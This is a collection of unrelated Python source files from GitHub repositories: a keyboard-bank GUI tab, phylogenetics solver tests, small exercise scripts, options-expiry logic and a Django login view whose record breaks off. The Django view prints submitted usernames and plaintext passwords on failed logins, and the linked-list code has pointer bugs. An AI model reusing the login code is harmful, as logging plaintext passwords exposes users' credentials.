(model) for which the new\n registration bank shall be created. 
As of version 0.2 this is just\n the model selected in the keyboard model combobox.\n '''\n # Retrieve selected keyboard model\n return self.cbxNewBankKeyModel.get_selected_data()\n\n\n def onKeyboardModelChanged(self, widget):\n '''\n Delegate methode called by the UI whenever the user selects another\n keyboard model from the combobox.\n '''\n # Retrieve list of allowed keyboard models (for mix-in)\n keyName = self.getNewBankKeyboardName()\n\n if keyName == const.UNKNOWN_MODEL \\\n or keyName == const.ALL_MODELS:\n self.allowedKeyboardNames = []\n else:\n regClass = regbank.bankfile.BankFile.getClassForKeyboardName(keyboardName=keyName)\n self.allowedKeyboardNames = regClass.getAllKeyboardNames()\n\n # Update filter\n if not self.prevFilter == const.FILTER_NONE:\n self.prevFilter = const.FILTER_UNDEFINED\n\n # Notify handlers\n self.emit(\"keyboard-model-changed\")\n\n\n # Drag and drop support....................................................\n\n def checkCopyRegToNewBank(self, row):\n '''\n This method gets called by an EasyDragAndDrop object which implements\n the drag and drop behaviour for both TreeViews.\n '''\n # Check keyboard model\n newBankModel = self.getNewBankKeyboardName()\n RegModel = row.model\n\n if newBankModel == const.UNKNOWN_MODEL:\n self.wndMain.setStatusMessage(const.msg[\"invalid-key-name\"])\n return False\n\n elif not RegModel in self.allowedKeyboardNames \\\n and not RegModel == const.ALL_MODELS \\\n and not newBankModel == const.ALL_MODELS:\n self.wndMain.setStatusMessage(\n const.msg[\"incompatible-keys\"] % {\n \"srcName\": const.keyboardNameLong[RegModel],\n \"dstName\": const.keyboardNameLong[newBankModel],\n }\n )\n return False\n\n # Check maximum amount\n bankClass = regbank.bankfile.BankFile.getClassForKeyboardName(newBankModel)\n\n if len(self.oblNewBank) >= bankClass.maxReg:\n self.wndMain.setStatusMessage(const.msg[\"max-allowed-regs\"] % (bankClass.maxReg))\n return False\n\n # Grant if nothing found\n return True\n\n\n def getDataNewBank(self):\n '''\n Callback function used by EasyDragAndDrop in order to query selected\n data dragged from \"New Bank\" list back to \"Available Registrations\"\n list.\n '''\n return self.oblNewBank.get_selected()\n\n\n def getDataAvailableRegs(self):\n '''\n Callback function used by EasyDragAndDrop in order to query selected\n data dragged from \"Available Registrations\" list to \"New Bank\" list.\n '''\n return self.oblAvailableRegs.get_selected()\n\n\n def copyColumn(self, src, dst, row):\n '''\n This method copies the given column from source ObjectList to\n destination ObjectList. It's not meant for direct use. Instead it's\n passed to an EasyDragAndDrop instance.\n '''\n dst.append(row.copy())\n self.wndMain.setStatusMessage(const.msg[\"added-to-bank\"] % (row.name))\n\n # Emit newlist-changed signal\n if dst == self.oblNewBank:\n self.emit(\"newlist-updated\")\n\n\n def removeColumn(self, src, dst, row):\n '''\n This method removes the given column from the source ObjectList. It's\n not meant for direct use. Instead it's passed to an EasyDragAndDrop\n instance.\n '''\n if not row:\n return\n\n self.oblNewBank.remove(row)\n self.wndMain.setStatusMessage(const.msg[\"removed-from-bank\"] % (row.name))\n\n\n # User aids ...............................................................\n\n def checkAllowedButtons(self, *data):\n '''\n Event handler which reacts to several events. 
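        # -- Editor's aside (illustration only, hypothetical names) -- the
        # handler derives one boolean per button from the current list sizes
        # and selected model, then applies them all in a single pass, e.g.:
        #
        #     states = {'add': model_known and available > 1,
        #               'remove': new_bank >= 1,
        #               'move': new_bank >= 2}
        #     for name, ok in states.items():
        #         buttons[name].set_sensitive(ok)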
It checks which buttons\n after the event are valid and disables all invalid buttons.\n '''\n # Calculate button validity\n btnAdd = True\n btnRemove = True\n btnBatch = True\n btnSave = True\n btnClear = True\n btnUp = True\n btnDown = True\n\n if self.getNewBankKeyboardName() == const.UNKNOWN_MODEL \\\n or self.getNewBankKeyboardName() == const.ALL_MODELS:\n btnAdd = False\n btnBatch = False\n btnSave = False\n\n if len(self.oblNewBank) < 1:\n btnRemove = False\n btnClear = False\n\n if len(self.oblNewBank) < 2:\n btnUp = False\n btnDown = False\n\n if len(self.oblAvailableRegs) < 2:\n # NOTE: ### EMPTY ### entry does always exist\n btnAdd = False\n btnBatch = False\n\n # Disable invalid buttons\n self.wndMain.btnAddSelected.set_sensitive(btnAdd)\n self.wndMain.btnRemoveSelected.set_sensitive(btnRemove)\n self.wndMain.btnBatch.set_sensitive(btnBatch)\n self.wndMain.btnSaveBank.set_sensitive(btnSave)\n self.wndMain.btnClearList.set_sensitive(btnClear)\n self.wndMain.btnNewUp.set_sensitive(btnUp)\n self.wndMain.btnNewDown.set_sensitive(btnDown)\n\n\n # Widget specific event handlers...........................................\n\n def on_oblAvailableRegs_cell_edited(self, *args): # Manually connected\n '''\n Event handler which responds whenever the user edits the name of\n an available registration. The change will be stored to the associated\n regfile which will also renamed.\n '''\n self.availableRegRename(args[1])\n\n\n def on_oblNewBank_cell_edited(self, *args): # Manually connected\n '''\n Event handler which responds whenever the user edits the name of\n a registration of a new bank. The call gets delegated to method\n newBankRegRename of the same class.\n '''\n self.newBankRegRename(args[1])\n","repo_name":"DennisSchulmeister/psr-reg-shuffle-v0","sub_path":"trunk/src/createbanktab.py","file_name":"createbanktab.py","file_ext":"py","file_size_in_byte":28012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18908134906","text":"\"\"\"\nTest NeighborJoiningSolver in Cassiopeia.solver.\n\"\"\"\nimport unittest\nfrom typing import Dict, Optional\nfrom unittest import mock\n\nimport itertools\nimport networkx as nx\nimport numpy as np\nimport pandas as pd\n\nimport cassiopeia as cas\n\n\ndef find_triplet_structure(triplet, T):\n a, b, c = triplet[0], triplet[1], triplet[2]\n a_ancestors = [node for node in nx.ancestors(T, a)]\n b_ancestors = [node for node in nx.ancestors(T, b)]\n c_ancestors = [node for node in nx.ancestors(T, c)]\n ab_common = len(set(a_ancestors) & set(b_ancestors))\n ac_common = len(set(a_ancestors) & set(c_ancestors))\n bc_common = len(set(b_ancestors) & set(c_ancestors))\n structure = \"-\"\n if ab_common > bc_common and ab_common > ac_common:\n structure = \"ab\"\n elif ac_common > bc_common and ac_common > ab_common:\n structure = \"ac\"\n elif bc_common > ab_common and bc_common > ac_common:\n structure = \"bc\"\n return structure\n\n\n# specify dissimilarity function for solvers to use\ndef delta_fn(\n x: np.array,\n y: np.array,\n missing_state: int,\n priors: Optional[Dict[int, Dict[int, float]]],\n):\n d = 0\n for i in range(len(x)):\n if x[i] != y[i]:\n d += 1\n return d\n\n\nclass TestNeighborJoiningSolver(unittest.TestCase):\n def setUp(self):\n\n # --------------------- General NJ ---------------------\n cm = pd.DataFrame.from_dict(\n {\n \"a\": [0, 1, 2],\n \"b\": [1, 1, 2],\n \"c\": [2, 2, 2],\n \"d\": [1, 1, 1],\n \"e\": [0, 0, 0],\n },\n orient=\"index\",\n columns=[\"x1\", \"x2\", \"x3\"],\n 
)\n\n delta = pd.DataFrame.from_dict(\n {\n \"a\": [0, 15, 21, 17, 12],\n \"b\": [15, 0, 10, 6, 17],\n \"c\": [21, 10, 0, 10, 23],\n \"d\": [17, 6, 10, 0, 19],\n \"e\": [12, 17, 23, 19, 0],\n },\n orient=\"index\",\n columns=[\"a\", \"b\", \"c\", \"d\", \"e\"],\n )\n\n self.cm = cm\n self.basic_dissimilarity_map = delta\n self.basic_tree = cas.data.CassiopeiaTree(\n character_matrix=cm, dissimilarity_map=delta, root_sample_name=\"b\"\n )\n\n self.nj_solver = cas.solver.NeighborJoiningSolver(add_root=True)\n\n # ---------------- Lineage Tracing NJ ----------------\n\n pp_cm = pd.DataFrame.from_dict(\n {\n \"a\": [1, 1, 0],\n \"b\": [1, 2, 0],\n \"c\": [1, 2, 1],\n \"d\": [2, 0, 0],\n \"e\": [2, 0, 2],\n },\n orient=\"index\",\n columns=[\"x1\", \"x2\", \"x3\"],\n )\n\n self.pp_tree = cas.data.CassiopeiaTree(character_matrix=pp_cm)\n\n self.nj_solver_delta = cas.solver.NeighborJoiningSolver(\n dissimilarity_function=delta_fn, add_root=True\n )\n\n # ------------- CM with Duplictes -----------------------\n duplicates_cm = pd.DataFrame.from_dict(\n {\n \"a\": [1, 1, 0],\n \"b\": [1, 2, 0],\n \"c\": [1, 2, 1],\n \"d\": [2, 0, 0],\n \"e\": [2, 0, 2],\n \"f\": [2, 0, 2],\n },\n orient=\"index\",\n columns=[\"x1\", \"x2\", \"x3\"],\n )\n\n self.duplicate_tree = cas.data.CassiopeiaTree(\n character_matrix=duplicates_cm\n )\n\n # ------------- NJ with modified hamming dissimilarity ------------\n priors = {0: {1: 0.5, 2: 0.5}, 1: {1: 0.2, 2: 0.8}, 2: {1: 0.3, 2: 0.7}}\n self.pp_tree_priors = cas.data.CassiopeiaTree(\n character_matrix=pp_cm, priors=priors\n )\n self.nj_solver_modified = cas.solver.NeighborJoiningSolver(\n dissimilarity_function=cas.solver.dissimilarity.weighted_hamming_distance,\n add_root=True,\n )\n\n def test_constructor(self):\n self.assertIsNotNone(self.nj_solver_delta.dissimilarity_function)\n self.assertIsNotNone(self.basic_tree.get_dissimilarity_map())\n\n nothing_solver = cas.solver.NeighborJoiningSolver(\n dissimilarity_function=None, add_root=False\n )\n\n no_root_tree = cas.data.CassiopeiaTree(\n character_matrix=self.cm,\n dissimilarity_map=self.basic_dissimilarity_map,\n )\n\n with self.assertRaises(cas.solver.DistanceSolver.DistanceSolverError):\n nothing_solver.solve(no_root_tree)\n\n no_root_solver = cas.solver.NeighborJoiningSolver(\n dissimilarity_function=None, add_root=True\n )\n\n with self.assertRaises(cas.solver.DistanceSolver.DistanceSolverError):\n no_root_solver.solve(no_root_tree)\n\n root_only_tree = cas.data.CassiopeiaTree(\n character_matrix=self.cm, root_sample_name=\"b\"\n )\n\n with self.assertRaises(cas.solver.DistanceSolver.DistanceSolverError):\n nothing_solver.solve(root_only_tree)\n\n nj_solver_fn = cas.solver.NeighborJoiningSolver(\n add_root=True, dissimilarity_function=delta_fn\n )\n nj_solver_fn.solve(self.basic_tree)\n\n self.assertEqual(\n self.basic_tree.get_dissimilarity_map().loc[\"a\", \"b\"], 15\n )\n\n def test_compute_q(self):\n q_vals = self.nj_solver.compute_q(self.basic_dissimilarity_map.values)\n\n expected_q = pd.DataFrame.from_dict(\n {\n \"state0\": [0, -22.67, -22, -22, -33.33],\n \"state1\": [-22.67, 0, -27.33, -27.33, -22.67],\n \"state2\": [-22, -27.33, 0, -28.67, -22],\n \"state3\": [-22, -27.33, -28.67, 0, -22],\n \"state4\": [-33.33, -22.67, -22, -22, 0],\n },\n orient=\"index\",\n columns=[\"state0\", \"state2\", \"state3\", \"state4\", \"state5\"],\n )\n\n self.assertTrue(np.allclose(q_vals, expected_q, atol=0.1))\n\n def test_find_cherry(self):\n\n cherry = 
self.nj_solver.find_cherry(self.basic_dissimilarity_map.values)\n delta = self.basic_dissimilarity_map\n node_i, node_j = (delta.index[cherry[0]], delta.index[cherry[1]])\n\n self.assertIn((node_i, node_j), [(\"a\", \"e\"), (\"e\", \"a\")])\n\n def test_update_dissimilarity_map(self):\n\n delta = self.basic_dissimilarity_map\n\n cherry = self.nj_solver.find_cherry(delta.values)\n node_i, node_j = (delta.index[cherry[0]], delta.index[cherry[1]])\n\n delta = self.nj_solver.update_dissimilarity_map(\n delta, (node_i, node_j), \"f\"\n )\n\n expected_delta = pd.DataFrame.from_dict(\n {\n \"f\": [0, 10, 16, 12],\n \"b\": [10, 0, 10, 6],\n \"c\": [16, 10, 0, 10],\n \"d\": [12, 6, 10, 0],\n },\n orient=\"index\",\n columns=[\"f\", \"b\", \"c\", \"d\"],\n )\n\n for sample in expected_delta.index:\n for sample2 in expected_delta.index:\n self.assertEqual(\n delta.loc[sample, sample2],\n expected_delta.loc[sample, sample2],\n )\n\n def test_basic_solver(self):\n\n self.nj_solver.solve(self.basic_tree)\n\n # test leaves exist in tree\n _leaves = self.basic_tree.leaves\n\n self.assertEqual(\n len(_leaves), self.basic_dissimilarity_map.shape[0] - 1\n )\n for _leaf in _leaves:\n self.assertIn(_leaf, self.basic_dissimilarity_map.index.values)\n\n # test for expected number of edges\n edges = list(self.basic_tree.edges)\n self.assertEqual(len(edges), 6)\n\n # test relationships between samples\n expected_tree = nx.DiGraph()\n expected_tree.add_edges_from(\n [\n (\"5\", \"a\"),\n (\"5\", \"e\"),\n (\"6\", \"5\"),\n (\"b\", \"6\"),\n (\"6\", \"7\"),\n (\"7\", \"d\"),\n (\"7\", \"c\"),\n ]\n )\n\n observed_tree = self.basic_tree.get_tree_topology()\n triplets = itertools.combinations([\"a\", \"c\", \"d\", \"e\"], 3)\n for triplet in triplets:\n expected_triplet = find_triplet_structure(triplet, expected_tree)\n observed_triplet = find_triplet_structure(triplet, observed_tree)\n self.assertEqual(expected_triplet, observed_triplet)\n\n self.nj_solver.solve(self.basic_tree, collapse_mutationless_edges=True)\n expected_tree = nx.DiGraph()\n expected_tree.add_nodes_from([\"a\", \"b\", \"c\", \"d\", \"e\", \"5\", \"6\", \"7\"])\n expected_tree.add_edges_from(\n [(\"6\", \"a\"), (\"6\", \"e\"), (\"b\", \"6\"), (\"6\", \"d\"), (\"6\", \"c\")]\n )\n observed_tree = self.basic_tree.get_tree_topology()\n triplets = itertools.combinations([\"a\", \"c\", \"d\", \"e\"], 3)\n for triplet in triplets:\n expected_triplet = find_triplet_structure(triplet, expected_tree)\n observed_triplet = find_triplet_structure(triplet, observed_tree)\n self.assertEqual(expected_triplet, observed_triplet)\n\n # compare tree distances\n observed_tree = observed_tree.to_undirected()\n expected_tree = expected_tree.to_undirected()\n for i in range(len(_leaves)):\n sample1 = _leaves[i]\n for j in range(i + 1, len(_leaves)):\n sample2 = _leaves[j]\n self.assertEqual(\n nx.shortest_path_length(observed_tree, sample1, sample2),\n nx.shortest_path_length(expected_tree, sample1, sample2),\n )\n\n def test_nj_solver_weights(self):\n self.nj_solver_modified.solve(self.pp_tree_priors)\n observed_tree = self.pp_tree_priors.get_tree_topology()\n\n expected_tree = nx.DiGraph()\n expected_tree.add_edges_from(\n [\n (\"root\", \"7\"),\n (\"7\", \"6\"),\n (\"6\", \"d\"),\n (\"6\", \"e\"),\n (\"7\", \"8\"),\n (\"8\", \"a\"),\n (\"8\", \"9\"),\n (\"9\", \"b\"),\n (\"9\", \"c\"),\n ]\n )\n\n triplets = itertools.combinations([\"a\", \"b\", \"c\", \"d\", \"e\"], 3)\n for triplet in triplets:\n expected_triplet = find_triplet_structure(triplet, expected_tree)\n 
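            # Editor's note: comparing triplet structures checks topology
            # without depending on internal node labels -- for every leaf
            # triple, the pair sharing the most common ancestors must agree
            # between the expected and the observed tree.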
observed_triplet = find_triplet_structure(triplet, observed_tree)\n self.assertEqual(expected_triplet, observed_triplet)\n\n self.nj_solver_modified.solve(\n self.pp_tree_priors, collapse_mutationless_edges=True\n )\n observed_tree = self.pp_tree_priors.get_tree_topology()\n for triplet in triplets:\n expected_triplet = find_triplet_structure(triplet, expected_tree)\n observed_triplet = find_triplet_structure(triplet, observed_tree)\n self.assertEqual(expected_triplet, observed_triplet)\n\n def test_pp_solver(self):\n\n self.nj_solver_delta.solve(self.pp_tree)\n observed_tree = self.pp_tree.get_tree_topology()\n\n expected_tree = nx.DiGraph()\n expected_tree.add_edges_from(\n [\n (\"root\", \"9\"),\n (\"9\", \"8\"),\n (\"9\", \"7\"),\n (\"7\", \"6\"),\n (\"7\", \"a\"),\n (\"6\", \"b\"),\n (\"6\", \"c\"),\n (\"8\", \"e\"),\n (\"8\", \"d\"),\n ]\n )\n\n triplets = itertools.combinations([\"a\", \"b\", \"c\", \"d\", \"e\"], 3)\n for triplet in triplets:\n expected_triplet = find_triplet_structure(triplet, expected_tree)\n observed_triplet = find_triplet_structure(triplet, observed_tree)\n self.assertEqual(expected_triplet, observed_triplet)\n\n self.nj_solver_delta.solve(\n self.pp_tree, collapse_mutationless_edges=True\n )\n observed_tree = self.pp_tree.get_tree_topology()\n for triplet in triplets:\n expected_triplet = find_triplet_structure(triplet, expected_tree)\n observed_triplet = find_triplet_structure(triplet, observed_tree)\n self.assertEqual(expected_triplet, observed_triplet)\n\n def test_duplicate_sample_neighbor_joining(self):\n\n self.nj_solver_delta.solve(self.duplicate_tree)\n observed_tree = self.duplicate_tree.get_tree_topology()\n\n expected_tree = nx.DiGraph()\n expected_tree.add_edges_from(\n [\n (\"root\", \"9\"),\n (\"9\", \"8\"),\n (\"9\", \"7\"),\n (\"7\", \"6\"),\n (\"7\", \"a\"),\n (\"6\", \"b\"),\n (\"6\", \"c\"),\n (\"8\", \"10\"),\n (\"10\", \"e\"),\n (\"10\", \"f\"),\n (\"8\", \"d\"),\n ]\n )\n\n triplets = itertools.combinations([\"a\", \"b\", \"c\", \"d\", \"e\", \"f\"], 3)\n for triplet in triplets:\n expected_triplet = find_triplet_structure(triplet, expected_tree)\n observed_triplet = find_triplet_structure(triplet, observed_tree)\n self.assertEqual(expected_triplet, observed_triplet)\n\n def test_setup_root_finder_missing_dissimilarity_map(self):\n tree = cas.data.CassiopeiaTree(character_matrix=self.cm)\n with mock.patch.object(\n tree, \"compute_dissimilarity_map\"\n ) as compute_dissimilarity_map:\n self.nj_solver_delta.setup_root_finder(tree)\n compute_dissimilarity_map.assert_called_once_with(\n delta_fn, \"negative_log\", threads=1\n )\n self.assertEqual(tree.root_sample_name, \"root\")\n\n def test_setup_root_finder_existing_dissimilarity_map(self):\n tree = cas.data.CassiopeiaTree(\n character_matrix=self.cm,\n dissimilarity_map=self.basic_dissimilarity_map,\n )\n with mock.patch.object(\n tree, \"compute_dissimilarity_map\"\n ) as compute_dissimilarity_map:\n self.nj_solver_delta.setup_root_finder(tree)\n compute_dissimilarity_map.assert_not_called()\n self.assertEqual(tree.root_sample_name, \"root\")\n dissimilarity_map = tree.get_dissimilarity_map()\n self.assertEqual(\n {\"a\", \"b\", \"c\", \"d\", \"e\", \"root\"}, set(dissimilarity_map.index)\n )\n self.assertEqual(\n {\"a\", \"b\", \"c\", \"d\", \"e\", \"root\"}, set(dissimilarity_map.columns)\n )\n for leaf in self.cm.index:\n delta = delta_fn(\n [0] * tree.n_character,\n self.cm.loc[leaf].values,\n tree.missing_state_indicator,\n None,\n )\n self.assertEqual(dissimilarity_map.loc[leaf, 
\"root\"], delta)\n self.assertEqual(dissimilarity_map.loc[\"root\", leaf], delta)\n self.assertEqual(dissimilarity_map.loc[\"root\", \"root\"], 0)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"YosefLab/Cassiopeia","sub_path":"test/solver_tests/neighborjoining_solver_test.py","file_name":"neighborjoining_solver_test.py","file_ext":"py","file_size_in_byte":14790,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"48"} +{"seq_id":"21443801613","text":"# i) Enter student marks into an array (at least 15 elements)\r\nstudent_marks = []\r\nfor i in range(15):\r\n mark = int(input(f\"Enter the mark for student {i + 1}: \"))\r\n student_marks.append(mark)\r\n\r\n# ii) Find the highest mark using a simple sorting algorithm (e.g., selection sort)\r\ndef find_highest_mark(arr):\r\n n = len(arr)\r\n\r\n if n == 0:\r\n return None # Handle the case when the array is empty\r\n\r\n for i in range(n - 1):\r\n max_index = i\r\n for j in range(i + 1, n):\r\n if arr[j] > arr[max_index]:\r\n max_index = j\r\n arr[i], arr[max_index] = arr[max_index], arr[i] # Swap elements\r\n\r\n highest_mark = arr[0] # The highest mark will be the first element after sorting\r\n return highest_mark\r\n\r\nhighest_mark = find_highest_mark(student_marks)\r\n\r\nif highest_mark is not None:\r\n print(f\"The highest mark is {highest_mark}.\")\r\nelse:\r\n print(\"The array is empty.\")\r\n","repo_name":"Deshapriya1122/IMBS-C40032","sub_path":"Python Programming/Student marks.py","file_name":"Student marks.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20853922195","text":"# Leetcode 498\n# Given a matrix of M x N elements (M rows, N columns), return all elements of the matrix in diagonal order.\n#\ndef findDiagonalOrder(mat: List[List[int]]) -> List[int]:\n mat1 = mat\n m = len(mat1)\n if m == 0:\n return []\n n = len(mat1[0]) if m > 0 else 0\n dict_t = {}\n for i in range(m):\n for j in range(n):\n if (i + j) in dict_t.keys():\n dict_t[(i + j)].append([i, j])\n else:\n dict_t[(i + j)] = [[i, j]]\n\n list_req = []\n for k, v in dict_t.items():\n if k % 2 != 0:\n list_req.append(v)\n else:\n list_req.append(v[::-1])\n\n return [mat1[item[0]][item[1]] for sublist in list_req for item in sublist]\n","repo_name":"raghavendrahyd/leetcode_n_codesignal","sub_path":"leetcode_n_codesignal/diagonal_traversal_498.py","file_name":"diagonal_traversal_498.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37800478347","text":"\nclass Node:\n def __init__(self, data):\n self.data = data\n self.prev = None\n self.next = None\n\n\nclass linked_list:\n def __init__(self):\n self.head = None\n\n def insert_at_beginning(self, data):\n node = Node(data)\n temp = self.head\n temp.prev = node\n node.next = temp\n self.head = node\n node.prev = None\n\n def insert_at_last(self, data):\n node = Node(data)\n temp = self.head\n while(temp.next):\n temp = temp.next\n temp.next = node\n node.prev = temp\n node.next = None\n\n def insert_at_between(self, data, index):\n node = Node(data)\n temp = self.head\n for i in range(index - 1):\n temp = temp.next\n node.data = data\n node.next = temp.next\n temp.next = node\n\n def remove_at_beginning(self):\n temp = self.head\n self.head = temp.next\n temp.next = None\n\n def remove_at_last(self):\n temp = self.head.next\n prev = self.head\n 
while(temp.next != None):\n temp = temp.next\n prev = prev.next\n prev.next = None\n\n def remove_in_between(self, index):\n temp = self.head.next\n prev = self.head\n for i in range(index-1):\n prev = prev.next\n temp = temp.next\n prev.next = temp.next\n\n def print_list(self):\n itr = self.head\n while(itr):\n print(itr.data, end=\"-><-\")\n itr = itr.next\n print()\n\n\nif __name__ == '__main__':\n ll = linked_list()\n n1 = Node(20)\n ll.head = n1\n n2 = Node(40)\n n2.prev = n1\n n1.next = n2\n n2.next = None\n print(\"This is our Double linked list: \")\n ll.print_list()\n print()\n\n print(\"Elements added at beginning: \")\n ll.insert_at_beginning(30)\n ll.insert_at_beginning(10)\n ll.print_list()\n\n print(\"Elements added at last: \")\n ll.insert_at_last(50)\n ll.insert_at_last(60)\n ll.print_list()\n \n print(\"Elements added in between: \")\n ll.insert_at_between(10000, 2)\n ll.print_list()\n\n print(\"Now element will be deleted from beginning: \")\n ll.remove_at_beginning()\n ll.print_list()\n\n print(\"Now element will be deleted from last: \")\n ll.remove_at_last()\n ll.print_list()\n\n print(\"Now element will be deleted from between: \")\n ll.remove_in_between(1)\n ll.print_list()\n","repo_name":"Pranjal-Tripathi-01/Data_Structures_Algorithms","sub_path":"Double_Linked_list.py","file_name":"Double_Linked_list.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7003792764","text":"\"\"\"\n\n Logic required to close out any expired options and properly handle the resulting positions.\n I'm pretty sure it covers every possible outcome, but could use a through code review.\n\n\"\"\"\n\n\n\n\nimport arrow\nfrom ..accounts import Account\nfrom ..assets import Option, Call, Put, Asset\nfrom ..adapters.quotes.QuoteAdapter import QuoteAdapter\nfrom ..orders import Order, Leg\nfrom ..positions import Position\n\nfrom ..adapters.markets import MarketAdapter\n\nfrom copy import copy\nfrom math import copysign\n\n\ndef drain_asset(positions, asset, quantity):\n \"\"\"\n Generic method of reducing the quantity of assets across an entire set of positions\n This is hard to do manually because positions can duplicates and arbitrary quantities\n Traverse the entire position set reducing quantities to zero until it hits the target reduction\n \"\"\"\n remaining_quantity = quantity\n\n # get a list of positions that are opposite to the quantity we are draining\n positions = [_ for _ in positions if _.asset == asset and copysign(1,_.quantity) == copysign(1, quantity * -1)]\n for position in positions:\n\n if abs(remaining_quantity) <= abs(position.quantity):\n # there are enough quantity in this position to complete it\n position.quantity += remaining_quantity\n remaining_quantity = 0\n return remaining_quantity\n\n if abs(remaining_quantity) > abs(position.quantity):\n # we are going to have some left over\n remaining_quantity += position.quantity\n position.quantity = 0\n\n return remaining_quantity\n\ndef close_expired_options(account:Account, quote_adapter:QuoteAdapter, market_adapter:MarketAdapter):\n \"\"\"\n Process an account's positions and handle the process of closing any expired options\n :param account:\n :return:\n \"\"\"\n\n # the effect of an options expiration can be thought of as an option transaction that was forced to take place\n # at exactly its intrinsic value, along with its resulting position\n # we simulate this by processing an order to make that happen\n 
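    # Editor's note: copy() performs a *shallow* copy, so starting_account
    # shares the same positions list as account and is mutated along with it;
    # a true snapshot would need copy.deepcopy (and the matching import).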
starting_account = copy(account)\n\n # no positions, bail\n if len(account.positions) == 0:\n return\n\n # get one quote so we can see what day it is\n current_date = quote_adapter.get_quote(asset=account.positions[0].asset.underlying if isinstance(account.positions[0].asset, Option) else account.positions[0].asset ).quote_date\n\n # get a list of all the options that are expired\n expired = [_ for _ in account.positions\n if isinstance(_.asset, Option)\n and arrow.get(_.asset.expiration_date).format('YYYY-MM-DD') < arrow.get(current_date).format('YYYY-MM-DD')]\n\n # no expirations, bail\n if len(expired) == 0:\n return\n\n # get a unique list of underlyings\n underlyings = list(set([_.asset.underlying.symbol for _ in expired]))\n\n # iterate through them\n for underlying in underlyings:\n\n # get a current quote\n underlying_quote = quote_adapter.get_quote(underlying)\n\n # get the positions in or of this underlying\n positions_in_underlying = [_ for _ in account.positions if (isinstance(_.asset, Option) and _.asset.underlying == underlying) or (_.asset == underlying)]\n\n # make a list of the positions of expiring options in this underlying\n expired_positions = [_ for _ in account.positions\n if isinstance(_.asset, Option)\n and arrow.get(_.asset.expiration_date).format('YYYY-MM-DD') <\n arrow.get(current_date).format('YYYY-MM-DD')\n ]\n\n # record the amount of long and short equity we have open to work with\n long_equity = sum([_.quantity for _ in positions_in_underlying\n if not isinstance(_.asset, Option)\n and _.quantity > 0\n ])\n short_equity = sum([_.quantity for _ in positions_in_underlying\n if not isinstance(_.asset, Option)\n and _.quantity < 0\n ])\n\n # start entering orders for the expired options\n for position in expired_positions:\n\n # figure out if the option is ITM\n is_itm = position.asset.get_intrinsic_value(underlying_price=underlying_quote.price) > 0\n\n if not is_itm:\n # if the option is not in the money, it expired worthless, force it to dissapear\n pass\n else:\n # the option is in the money, so we need to handle it\n\n if position.asset.option_type == 'call' and position.quantity > 0:\n # long calls expire by buying the stock at the strike price and\n # adding the option cost basis to the stock cost basis\n account.cash -= position.asset.strike * position.quantity * 100\n account.positions.append(Position(asset=underlying,\n quantity=abs(position.quantity) * 100,\n cost_basis=position.asset.strike + abs(position.cost_basis)))\n\n elif position.asset.option_type == 'call' and position.quantity < 0:\n # short calls expire by being forced to surrender the stock and get the strike price\n # we'll handle this by putting in a fixed price sell-to-close order for the underlying\n # if for some reason the order doesn't fill (like there is no stock available)\n\n # two things can happen here. 
Either you have enough shares to surrender and so you surrender them\n # or you don't have enough shares and you're forced to buy them to surrender\n\n # iterate through each quantity to make the code simpler\n for x in range(abs(position.quantity)):\n if long_equity > 100:\n # there is stock available to surrender\n # drain 100 shares\n drain_asset(positions=account.positions, asset=position.asset.underlying, quantity=-100)\n long_equity -= 100\n else:\n # there is not enough stock, so subtract enough cash to buy the shares\n account.cash -= underlying_quote.price * 100\n # then sell them back at the strike\n account.cash += position.asset.strike * 100\n\n elif position.asset.option_type == 'put' and position.quantity > 0:\n # long puts expire by you gaining short shares and cash at the strike\n # adding the option cost basis to the stock cost basis\n account.cash += position.asset.strike * abs(position.quantity) * 100\n account.positions.append(Position(asset=underlying,\n quantity= -1 * abs(position.quantity) * 100,\n cost_basis=position.asset.strike - abs(position.cost_basis)))\n\n elif position.asset.option_type == 'put' and position.quantity < 0:\n # short puts expire by you being forced to liquidate a short but you shares strike price in cash\n # iterate through each quantity to make the code simpler\n\n for x in range(abs(position.quantity)):\n if short_equity < -100:\n # we have short equity to give up\n # drain 100 shares\n drain_asset(positions=account.positions, asset=position.asset.underlying, quantity=100)\n account.cash -= underlying_quote.price * 100\n short_equity += 100\n else:\n # there is not enough short available, so you get to buy some shares, so take the cash\n account.cash -= underlying_quote.price * 100\n # and give it back\n account.cash += position.asset.strike * 100\n\n\n position.quantity = 0\n\n account.positions = [_ for _ in account.positions if _.quantity != 0]\n return account","repo_name":"philipodonnell/paperbroker","sub_path":"paperbroker/logic/close_expired_options.py","file_name":"close_expired_options.py","file_ext":"py","file_size_in_byte":8469,"program_lang":"python","lang":"en","doc_type":"code","stars":235,"dataset":"github-code","pt":"48"} +{"seq_id":"38106323268","text":"import traceback\n\nfrom django.shortcuts import render\n\n# Create your views here.\nimport random\nfrom django.contrib.auth import logout, authenticate, login\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom django.db import connection\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.shortcuts import render\nimport json\nfrom datetime import datetime\nfrom django.urls import reverse\nfrom .forms import RegisterForm\nfrom EventRegistrationHEApp.models import ErRegisteredUsers\n\n\n@login_required\ndef user_logout(request):\n logout(request)\n return HttpResponseRedirect(reverse('login'))\n\n\ndef user_login(request):\n if request.method == \"POST\":\n username = request.POST.get('username')\n password = request.POST.get('password')\n\n user = authenticate(username=username, password=password)\n\n if user:\n if user.is_active:\n login(request, user)\n return HttpResponseRedirect(reverse('dashboard'))\n else:\n return HttpResponse(\"Account not Active!\")\n else:\n print(\"Someone tried to login and failed!\")\n print(\"Username: {} and password {}\".format(username, password))\n return HttpResponse(\"Invalid Login details supplied\")\n\n else:\n return 
